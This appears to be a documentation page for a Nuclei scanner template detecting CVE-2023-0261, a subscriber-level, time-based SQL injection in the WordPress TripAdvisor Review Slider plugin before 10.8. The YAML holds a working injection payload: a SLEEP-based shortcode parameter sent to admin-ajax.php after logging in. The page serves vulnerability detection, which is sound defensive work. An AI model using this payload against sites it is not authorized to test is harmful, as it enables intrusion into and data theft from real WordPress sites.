WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection
ID: CVE-2023-0261
Severity: high
Author: theamanrawat
Tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps
Description
Section titled “Description”WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2023-0261
info: name: WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection author: theamanrawat severity: high description: | WordPress WP TripAdvisor Review Slider plugin before 10.8 is susceptible to authenticated SQL injection. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. This can lead, in turn, to obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation. remediation: Fixed in version 10.8. reference: - https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0 - https://wordpress.org/plugins/wp-tripadvisor-review-slider/ - https://nvd.nist.gov/vuln/detail/CVE-2023-0261 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-0261 cwe-id: CWE-89 epss-score: 0.0753 epss-percentile: 0.93501 cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | @timeout: 10s POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} content-type: application/x-www-form-urlencoded
action=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid="1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)"]
matchers: - type: dsl dsl: - 'duration_2>=6' - 'status_code_2 == 200' - 'contains(content_type_2, "application/json")' - 'contains(body_2, "\"data\":{")' condition: and# digest: 4a0a00473045022100ea703e9190450a07e080f4e097b6bb3d235d5309e4504fa3f0a16c13c626c9e602203148faa53f00803a2609f7070eb4ccf42d817f2b8a0115eb5ef2bdfabfcef800:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0261.yaml"